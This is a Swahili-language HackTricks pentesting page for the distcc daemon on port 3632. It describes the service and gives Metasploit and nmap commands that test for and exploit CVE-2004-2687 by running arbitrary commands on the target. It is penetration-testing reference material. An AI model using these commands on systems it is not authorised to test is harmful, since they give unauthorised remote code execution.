Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/3632-pentesting-distcc.md

41 lines
2.3 KiB
Markdown
Raw Blame History

<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
# Taarifa Msingi
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu za usindikaji zilizotulia** za kompyuta nyingine kwenye mtandao. Wakati **distcc** inapowekwa kwenye mashine, mashine hii inaweza kusambaza **kazi zake za uundaji** kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza **daemani ya distccd** na lazima awe na **kompaila inayoweza kufanya kazi** imewekwa ili iprocess nambari iliyotumwa.
**Bandari ya chaguo:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Utekaji
Angalia ikiwa ina hatari ya **CVE-2004-2687** ya kutekeleza nambari za aina yoyote:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Sidhani shodan inagundua huduma hii._
# Vyanzo
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Mchapishaji: **Álex B (@r1p)**
Reference in a new issue View git blame Copy permalink